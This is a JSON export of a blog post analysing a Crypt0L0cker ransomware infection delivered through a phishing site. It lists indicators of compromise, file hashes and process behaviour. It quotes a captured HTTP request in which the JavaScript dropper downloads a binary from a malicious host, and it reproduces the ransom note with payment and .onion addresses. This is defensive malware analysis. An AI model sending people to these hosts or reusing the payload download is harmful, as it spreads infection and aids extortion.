{"id":632,"date":"2016-12-15T14:54:07","date_gmt":"2016-12-15T14:54:07","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=632"},"modified":"2016-12-15T15:46:46","modified_gmt":"2016-12-15T15:46:46","slug":"2016-12-15-locky-infection-from-phishing-site","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=632","title":{"rendered":"2016-12-15 Crypt0L0cker Infection from Phishing Site"},"content":{"rendered":"

Here is an example of a Crypt0L0cker infection that I got from my Twitter feed. Thanks go to @JAMESWT_MHT<\/a> as he was the one that reposted the finding from @SettiDavide89<\/a>. Below is my write up for this one. The artifacts from this investigation can be found in my Github repo<\/a>.<\/p>\n

Indicators of Compromise
\n========================
\n5.200.35.167 \/ t2e.sda-express15.org (HTTP)
\n192.208.177.163 \/ inotechsalamat.com (HTTP)
\n154.35.32.5 (Only a SYN packet – no response)
\n94.177.12.9 \/ ukakal.shokogot.com (HTTPS)
\n94.177.12.9 \/ ulehyrabydo.shokogot.com (HTTPS)
\n94.177.12.9 \/ ohwvilubiki.shokogot.com (HTTPS)
\n86.59.21.38 \/ www.mk84h3987i4822ak.com (HTTPS)<\/p>\n

Artifacts From Investigation
\n============================<\/p>\n

File Name: sda_express.zip
\nFile size: 5KB
\nMD5 hash: 1baace2a5e0f9921ca5e497ad80b60b2
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/c483e3a56976d899387f2e7f987745fe05dbd5d38377f5b307123e9508f2c9f8\/analysis\/<\/a>
\nFirst Detection: 2016-12-15 10:38:06 UTC
\nDetection Ratio: 7 \/ 50<\/p>\n

File Name: sda_express
\nFile size: 16KB
\nMD5 hash: 5b1dcaf646784c84fe68ceccd85d65a4
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/e24ce1b0a4a59d4000e31ba76e08bde096b600d67c447e46d6d333e0448f65fe\/analysis\/<\/a>
\nFirst Detection: 2016-12-15 10:50:06 UTC
\nDetection Ratio: 4 \/ 54<\/p>\n

File Name: Pessary.Aj.egyvof
\nFile size: 370KB
\nMD5 hash: 5734e9a1dae2ea402fe5f3aebe0658f0
\nVirustotal: NA<\/p>\n

File Name: form[1].uio
\nFile size: 456KB
\nMD5 hash: cdba63494872f3879e507148e73d320e
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/11a151b4e7670bfaa8db4c28c3f9b4a3f1f779797f73b0f26add6119ff861641\/analysis\/<\/a>
\nFirst Detection: 2016-12-15 09:57:44 UTC
\nDetection Ratio: 7 \/ 56<\/p>\n

File Name: log4j_license.txt
\nFile size: 2.9KB
\nMD5 hash: 32c1e8b687f9c928c6b29b15f1193c7c
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/b772e0738ca8156c518f80ad869fcb064046f83403387c23720cad7804a3ce53\/analysis\/<\/a>
\nFirst Detection: 2015-04-27 05:56:13 UTC
\nDetection Ratio: 0 \/ 56<\/p>\n

ile Name: Temprad08832.tmp
\nFile size: 456B
\nMD5 hash: cdba63494872f3879e507148e73d320e
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/11a151b4e7670bfaa8db4c28c3f9b4a3f1f779797f73b0f26add6119ff861641\/analysis\/<\/a>
\nFirst Detection: 2016-12-15 09:57:44 UTC
\nDetection Ratio: 7 \/ 56<\/p>\n

File Name: aguwaluz
\nFile size: 1.1KB
\nMD5 hash: 3ba723c0e62d907e3026f9beb33bbdf6
\nVirustotal: NA<\/p>\n

File Name: apuwyquz
\nFile size: 16B
\nMD5 hash: 63eb37d1ba64b6fbc0c035ca07f1f098
\nVirustotal: NA<\/p>\n

File Name: asiwahiz
\nFile size: 456KB
\nMD5 hash: 33c20a4fdb83dac161b768987f3310a2
\nVirustotal: NA<\/p>\n

File Name: ebiwewiz
\nFile size: 64B
\nMD5 hash: 84322e7f4973f64e6604bb1292ea28e4
\nVirustotal: NA<\/p>\n

File Name: ewiwobiz
\nFile size: 16B
\nMD5 hash: 8910f0ab79720f052e77f1ddb234bb5b
\nVirustotal: NA<\/p>\n

File Name: opuwuquz
\nFile size: 3.7KB
\nMD5 hash: 6cf4affb80cc5ac799c79ecc783d7888
\nVirustotal: NA<\/p>\n

File Name: uquwupuz
\nFile size: 161KB
\nMD5 hash: 4cf062189d5926faf8332ce9f3c0743e
\nVirustotal: NA<\/p>\n

File Name: yluwaguz
\nFile size: 48B
\nMD5 hash: dc8310786a74c9540b50dcce98eb2bb9
\nVirustotal: NA<\/p>\n

Traffic Analysis of Malware
\n===========================<\/p>\n

When the user goes to the phishing site “t2e.sda-express15.org\/yrcuf.php?id=random” they get redirected to another site via a hidden iframe which proceeds to ask the user to download a zip file.<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

Once the user downloads the zip file and extracts and runs the Javascript file, the script goes out and grabs the file “form.uio” from inotechsalamat[.]com which is a binary file. Looking at the user-agent string, there is more details about the system as well then the user-agent string from above. I am not sure if it is looking for a certain version of Windows to drop a certain binary file. <\/p>\n

\r\nGET \/form.uio HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: inotechsalamat.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Thu, 15 Dec 2016 11:39:05 GMT\r\nServer: Apache\/2\r\nLast-Modified: Thu, 15 Dec 2016 10:18:43 GMT\r\nETag: "71e47-543afc72ccdfa-gzip"\r\nAccept-Ranges: bytes\r\nVary: Accept-Encoding,User-Agent\r\nContent-Encoding: gzip\r\nKeep-Alive: timeout=2, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.<\/pre>\n
Looking at the Process Monitor log, we see that the Javascript file is also creating another file on the system located at “C:\\Users\\%Username%\\AppData\\Local\\” called “Temprad08832.tmp.” Later on we see that this file gets launched from “cmd.exe,” runs for a while, and then terminates after creating another thread called “Temprad08832.tmp.” This process goes off and creates several other files\/processes as seen below.<\/p>\n
\"\"<\/a><\/p>\n
The “Temprad08832.tmp” also creates two DLL files (System and Tuning) that are located in the “C:\\Users\\%Username%\\AppData\\Local\\Temp” folder and “C:\\Users\\%Username%\\AppData\\Local\\Temp\\nsl261E.tmp” folder. From what I can tell it looks like the Temprad08832.tmp file along with the System.dll file helps create the Tuning.dll file:<\/p>\n
\"\"<\/a><\/p>\n
As things continue to progress, we see some new folders and files being created under the “C:\\ProgramData\\uwupefovygigylih” path as seen below.<\/p>\n
\"\"<\/a><\/p>\n
From here the encrypting of the file system begins. It is during this time that we start to see encrypted traffic going to the IP addresses of 94.177.12.9 and 86.59.21.38 over port 443. You can also see that the SVCHOST.exe process is the responsible process for calling out to these IP addresses.<\/p>\n
\"\"<\/a>
\n\"\"<\/a><\/p>\n
Once everything is done, we are greeted by the following screens. <\/p>\n
\"\"<\/a>
\n\"\"<\/a>
\n\"\"<\/a><\/p>\n
\r\nTranslated text\r\n================================================== =============================\r\n          !!! WE have encrypted your files with Crypt0L0cker VIRUSES !!!\r\n================================================== =============================\r\n\r\nYour important files (including network drives, USB, etc.): pictures, videos,\r\ndocument was encrypted with our Crypt0L0cker. The only way to get your files\r\nback is to pay us. Otherwise, your files will be lost.\r\n\r\n\r\nTo restore your files, you need to pay.\r\n\r\nTo restore files, access our website\r\nhttp:\/\/27c73bq66y4xqoh7.flyjo.pl\/su3trd2.php?user_code=XXXXX&user_pass=XXXX\r\nand follow the instructions.\r\n\r\nIf the site is not available, follow these steps:\r\n1. Download and install the TOR browser from this link: http:\/\/www.torproject.org\/download\/download-easy.html.en\r\n2. After installation, run the browser and enter the address: http: \/\/ztuw6bvuuapzdfya.onion\/su3trd2.php? User_code = XXXXX & user_pass = XXXX\r\n3. Follow the instructions on the website.\r\n\r\n================================================== =============================<\/pre>\n","protected":false},"excerpt":{"rendered":"
Here is an example of a Crypt0L0cker infection that I got from my Twitter feed. Thanks go to @JAMESWT_MHT as he was the one that reposted the finding from @SettiDavide89. Below is my write up for this one. The artifacts from this investigation can be found in my Github repo. Indicators of Compromise ======================== 5.200.35.167 \/ t2e.sda-express15.org (HTTP) 192.208.177.163 \/ inotechsalamat.com (HTTP) 154.35.32.5 (Only a SYN packet – no response) 94.177.12.9 \/ ukakal.shokogot.com (HTTPS) 94.177.12.9 \/ ulehyrabydo.shokogot.com (HTTPS) 94.177.12.9 \/ ohwvilubiki.shokogot.com (HTTPS) 86.59.21.38 \/ www.mk84h3987i4822ak.com (HTTPS) Artifacts From Investigation ============================ File Name: sda_express.zip File size: 5KB MD5 hash: 1baace2a5e0f9921ca5e497ad80b60b2 Virustotal:…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-632","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/632","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=632"}],"version-history":[{"count":4,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/632\/revisions"}],"predecessor-version":[{"id":650,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/632\/revisions\/650"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=632"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=632"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=632"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}